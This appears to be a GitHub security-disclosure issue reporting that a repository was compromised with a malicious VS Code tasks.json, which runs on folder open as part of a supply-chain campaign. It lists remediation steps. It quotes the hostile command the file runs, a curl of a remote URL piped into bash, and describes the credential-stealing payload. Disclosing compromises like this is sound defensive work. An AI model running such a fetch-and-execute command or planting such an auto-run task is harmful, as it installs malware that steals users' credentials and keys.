Security: Repository contains malicious .vscode/tasks.json (TasksJacker campaign) #161
Description
Security Disclosure: This repository has been compromised
The repository hackforla/knowledgebase-content was compromised on February 9, 2026 by the TasksJacker campaign — a DPRK-linked supply chain attack. A malicious .vscode/tasks.json file was injected that automatically executes malware when anyone opens this repository in VS Code.
This is not spam. This disclosure is from the OpenSourceMalware.com research team, which first identified and published research on this campaign.
Compromised file
.vscode/tasks.json— contains a task with"runOn": "folderOpen"trigger
What the malicious file does
The tasks.json silently executes curl https://260120.vercel.app/... | bash when the folder is opened in VS Code. The payload is a multi-stage infostealer and backdoor targeting:
- Browser credentials and cookies
- Cryptocurrency wallet data
- SSH keys and Git credentials
- AWS/cloud credentials and API tokens
Why this matters for hackforla
As a civic tech organization with community volunteers, any contributor who has cloned and opened this repo in VS Code may have been compromised. We recommend notifying your contributors.
Immediate remediation steps
- Delete
.vscode/tasks.jsonfrom this repository - Force-push to remove it from git history
- Rotate credentials: The GitHub account credentials used to push to this repo were compromised — rotate PATs, SSH keys, and passwords
- Enable 2FA on all accounts with push access
- Notify contributors who may have cloned this repo between Feb 9 and now
- Scan machines of anyone with push access:
ps aux | grep "\.vscode.*node" ls -la ~/.vscode/node-v*-*/
More information
- Full technical analysis: https://opensourcemalware.com/blog/tasksjacker
- Campaign scope: 354+ repositories across 229+ accounts compromised
- Attribution: DPRK-affiliated threat actors (medium-high confidence)
Disclosed by the OpenSourceMalware.com research team.